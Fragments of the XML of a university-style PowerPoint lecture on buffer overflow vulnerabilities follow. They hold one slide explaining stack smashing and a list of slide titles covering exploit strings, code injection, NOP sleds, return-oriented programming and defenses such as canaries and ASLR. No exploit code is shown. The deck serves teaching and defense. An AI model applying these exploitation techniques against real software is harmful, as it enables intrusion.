          <a:xfrm>
            <a:off x="1928596" y="4439084"/>
            <a:ext cx="3234090" cy="1078030"/>
            <a:chOff x="8341092" y="2483318"/>
            <a:chExt cx="3234090" cy="1078030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="834109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0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8880107"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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="941912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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9958137"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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10497152" y="2483318"/>
              <a:ext cx="539015" cy="53901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00"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="834109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H</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="888010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e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="941912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l</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="995813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l</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10497152"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o</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11036167" y="3022333"/>
              <a:ext cx="539015" cy="539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75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>\0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202298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C63F-E3B5-8A4F-B9E7-920F068299F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1737C494-6C59-9B45-9FC8-1B3B77FEB415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exceeding an array’s bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using more memory than allocated for the array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C does not check bounds – for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> element array, A[0], A[-1], and A[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] are all equally-legal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common buffer overflows involve strings allocated on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>aka, “stack smashing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#1 technical security vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#1 security vulnerability is human user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22BF55F0-237C-AB44-8EEE-6EFD5AA829A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631084" y="4574203"/>
            <a:ext cx="5560916" cy="1918672"/>
            <a:chOff x="6631084" y="4574203"/>
            <a:chExt cx="5560916" cy="1918672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3910FFE3-6081-4E43-9594-3A5FF3EE7385}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6631084" y="4574203"/>
              <a:ext cx="5560916" cy="1692453"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7935F19E-B668-CF4A-8EF0-BCAB87EDF90E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8027498" y="6215876"/>
              <a:ext cx="3909404" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>https://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                <a:t>twitter.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                <a:t>thegrugq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>/status/563964286783877121</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38708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34179</TotalTime>
  <Words>7952</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1357</Paragraphs>
  <Slides>50</Slides>
  <Notes>34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Lucida Console</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Buffer Overflow Vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Refresher on Memory Layout </vt:lpstr>
      <vt:lpstr>Refresher on Memory Layout</vt:lpstr>
      <vt:lpstr>Refresher on Memory Layout: non-const strings typically on stack</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>What is a Buffer Overflow?</vt:lpstr>
      <vt:lpstr>Sometimes Buffer Overflows are Accidental</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>gets() The Most Direct Way to Introduce Vulnerability</vt:lpstr>
      <vt:lpstr>Example Vulnerability</vt:lpstr>
      <vt:lpstr>Example Vulnerability</vt:lpstr>
      <vt:lpstr>Example Vulnerability: No buffer overflow</vt:lpstr>
      <vt:lpstr>Example Vulnerability: Off-by-one error</vt:lpstr>
      <vt:lpstr>Example Vulnerability: Maximum error w/o side-effect</vt:lpstr>
      <vt:lpstr>Example Vulnerability: Affecting Control Flow</vt:lpstr>
      <vt:lpstr>The Five Stages of Exploiting Buffer Overflow</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Let’s “Return” to a Different Function</vt:lpstr>
      <vt:lpstr>Let’s “Return” to a Different Function</vt:lpstr>
      <vt:lpstr>Creating the Exploit String</vt:lpstr>
      <vt:lpstr>Attacking the Vulnerability</vt:lpstr>
      <vt:lpstr>The Five Stages of Exploiting Buffer Overflow</vt:lpstr>
      <vt:lpstr>Injecting &amp; Executing New Code</vt:lpstr>
      <vt:lpstr>Where to Place New Code?</vt:lpstr>
      <vt:lpstr>Our attack</vt:lpstr>
      <vt:lpstr>Our attack: Option 1</vt:lpstr>
      <vt:lpstr>Our attack: Option 2</vt:lpstr>
      <vt:lpstr>Our Attack</vt:lpstr>
      <vt:lpstr>Injecting and Executing the Exploit String</vt:lpstr>
      <vt:lpstr>How’d That Happen?</vt:lpstr>
      <vt:lpstr>The Five Stages of Exploiting Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow Defenses</vt:lpstr>
      <vt:lpstr>Programmer-Level Protections Prevent Vulnerabilities</vt:lpstr>
      <vt:lpstr>Compiler-Level Protection Introduce Stack Canaries</vt:lpstr>
      <vt:lpstr>Code with &amp; without Stack Canary </vt:lpstr>
      <vt:lpstr>Detecting Buffer Overflow</vt:lpstr>
      <vt:lpstr>System-Level Protections 1. Randomized Stack Offset</vt:lpstr>
      <vt:lpstr>Counter-countermeasure NOP Sled</vt:lpstr>
      <vt:lpstr>Counter-countermeasure NOP Sled</vt:lpstr>
      <vt:lpstr>System-Level Protections 2. Non-Executable Stacks</vt:lpstr>
      <vt:lpstr>Counter-countermeasure Return-Oriented Programming (ROP)</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>ROP Concept</vt:lpstr>
      <vt:lpstr>Gadget Sources</vt:lpstr>
      <vt:lpstr>Gadget Sources</vt:lpstr>
      <vt:lpstr>ROP Injection String</vt:lpstr>
      <vt:lpstr>System-Level Protections 3. Address Space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>Key Ideas</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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271</cp:revision>
  <cp:lastPrinted>2021-05-20T19:50:28Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-03T19:54:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-20T15:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>